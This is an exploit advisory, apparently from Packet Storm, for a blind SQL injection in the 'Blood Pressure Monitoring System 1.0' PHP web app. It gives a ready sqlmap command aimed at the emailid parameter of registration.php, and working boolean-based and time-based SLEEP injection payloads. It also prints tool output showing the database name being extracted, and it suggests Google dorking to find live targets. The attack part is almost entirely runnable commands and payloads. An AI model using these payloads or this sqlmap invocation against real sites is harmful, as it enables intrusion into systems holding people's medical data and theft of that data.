Share
## https://sploitus.com/exploit?id=PACKETSTORM:181760
=============================================================================================================================================  
| # Title : Blood Pressure Monitoring System 1.0 Blind Sql Injection injection Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |  
| # Vendor : https://www.kashipara.com/project/download/project2/user/2023/202305/kashipara.com_bp-monitoring-management-s.zip |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking ฤฐn Google Or Other Search Enggine.  
  
[+] use payload : E:\sqlmap>python sqlmap.py -u 127.0.0.1//bpmms/registration.php --method POST --data "submit=&emailid=if" -p emailid --risk 3 --level 3 --dbms mysql --batch --current-db  
  
[+] http://127.0.0.1/bpmms/edit-family-member.php?fmid=1  
  
---  
Parameter: emailid (POST)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: submit=&emailid=if' AND 9071=9071 AND 'xVZD'='xVZD  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: submit=&emailid=if' AND (SELECT 2282 FROM (SELECT(SLEEP(5)))lwti) AND 'gxpM'='gxpM  
---  
[18:10:58] [INFO] the back-end DBMS is MySQL  
web application technology: Apache 2.4.58, PHP 8.0.30  
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)  
[18:10:58] [INFO] fetching current database  
[18:10:58] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval  
[18:10:58] [INFO] retrieved: bpmmsdb  
current database: 'bpmmsdb'  
[18:11:00] [INFO] fetched data logged to text files under 'C:\Users\indoushka\AppData\Local\sqlmap\output\127.0.0.1'  
  
[*] ending @ 18:11:00 /2024-09-20/  
  
Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================